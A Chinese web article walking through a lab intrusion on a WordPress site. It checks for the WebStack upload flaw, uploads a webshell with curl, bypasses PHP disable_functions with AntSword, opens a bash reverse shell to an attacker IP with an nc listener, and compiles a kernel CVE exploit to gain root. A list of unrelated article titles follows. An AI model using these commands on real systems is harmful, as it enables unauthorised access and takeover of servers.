当前位置: 首页 > news >正文

网站渗透实操!从getshell到CVE提权,Linux最新内核也可提权!

前段时间Webstack写马漏洞公开渗透思路如下从webstack写马→蚁剑连接→绕过disable_functions→nc反弹→exp提权实操开始靶场我用自建WordPress要看一个webstack站点有没有漏洞可以访问wp-admin/admin-ajax.php?actionimg_upload路径如果显示0如图那十有八九就是有这个漏洞开始写马在当前目录下创建好木马php文件然后运行命令上传木马curl -F filesshell.php https://目标站点/wp-admin/admin-ajax.php?actionimg_upload如图返回上传成功和木马地址直接访问木马地址显示白页说明木马正常可用蚁剑连接测试连接显示成功然后直接添加然后打开虚拟终端发现任何命令都无法执行原因是禁用了函数这里需要用到蚁剑插件绕过 disable_functions使用蚁剑绕函数插件靶场php版本为8.1选择对应模式点击开始发现命令可成功执行接下来就直接开始反弹了Bash反弹蚁剑虚拟终端靶机运行bash -i /dev/tcp/攻击机IP/4444 01攻击机运行nc -lvnp 4444用来监听4444端口此处需攻击机先监听端口靶机再执行反弹命令反弹连接成功执行cat /etc/os-release命令看看操作系统发现是乌班图26系统然后执行lsmod | grep rds命令发现模块也开启了刚好可以复现CVE-2026-43494开始测试通过蚁剑上传poc然后运行gcc -O CVE-2026-43494.c -o exp编译poc运行命令file exp看看文件编译成功没看得到exp文件是编译成功开始提权直接运行./exp出现如图不报错等待一会直接whoami查看当前用户显示root用户输入id回车也是root用户至此整场渗透结束结束语最后请大家多注重网络安全及时更新内核补丁防患于未然。
http://www.rkmt.cn/news/1409902.html

相关文章:

  • 从Arduino到ESP32:搞定3.3V/5V混接通信,这几种电平转换电路你试过吗?
  • Python实战:用XGBoost+SHAP搞定多分类业务预测(附完整代码与避坑指南)
  • LAMMPS新手避坑指南:从应力云图到MSD分析,这8个计算命令别再写错了
  • 告别手动移植:用STM32CubeIDE一站式搞定STM32WL的LoRaWAN节点工程
  • 从普通到Low ESR:手把手教你读懂铝电解电容规格书里的‘损耗角’与ESR换算
  • 保姆级教程:用Grad-CAM可视化Swin Transformer,看看你的模型到底在“看”哪里
  • 别让天线罩毁了你的毫米波雷达!从材料选择到壁厚计算,一份给硬件工程师的避坑指南
  • 信号处理/通信算法必看:用Wirtinger导数搞定复数域梯度下降(附Python代码)
  • 抖音无水印视频下载终极指南:免费获取高清原视频的完整方案
  • 手把手教你用CMP Facade数据集做图像修复:从下载到实战的保姆级教程
  • 用Python+MediaPipe+OpenCV做个手势识别小游戏:5分钟搞定石头剪刀布
  • 2026年热镀锌铁皮厂家推荐榜单:宝钢/首钢/鞍钢/马钢/武钢/本钢/柳钢/唐钢/日照/包钢等优质品牌实力对比与选购指南 - 品牌企业推荐师(官方)
  • 北光恒电:安捷伦8494A步进可调衰减器 衰减量异常故障排查
  • 用Python手把手复现FOIL算法:从家庭关系图谱到知识推理的完整实战
  • RK3566开发板GT911触屏调试避坑指南:从I2C检测到DTS配置的完整流程
  • RK3566 GPIO驱动调试踩坑实录:从设备树配置到万用表测量的完整排错指南
  • 告别高延迟!在Unity里用海康SDK直接拉RTSP流,实现低延时监控画面
  • 别再为IIS安装报错头疼了!一招搞定‘找不到源文件’和.NET 3.5依赖问题
  • Proteus仿真STM32的ADC时总卡死?可能是你的采样周期和DMA配置错了(STM32F103+HAL库排坑实录)
  • 腾讯会议共享PPT时,如何偷偷看备注?用这个隐藏技巧,演讲者模式秒开启
  • 100 小时算力领取专属二维码
  • AutoBridge:LLM驱动的IoT设备集成代码自动生成技术
  • 加速数据觉醒,重塑智能底座——HPE发布AI智能体存储HPE Alletra Storage MP X10000
  • Cortex-M3/M4调试系统设计:TPIU与CoreSight Funnel应用
  • 从零开始:构建你的缠论量化交易系统 - Chanlun-Pro实战指南
  • 3分钟掌握:tchMaterial-parser电子课本下载工具完整使用指南
  • VCS仿真Xilinx IP核必看:synopsys_sim.setup文件配置详解与三大搜索路径实战
  • 小型夹爪有哪些选购办法?2026年小型夹爪品牌推荐 - 品牌2025
  • ULINK2调试器JTAG通信故障排查全攻略
  • LMAR框架:大语言模型增强的语义检索技术解析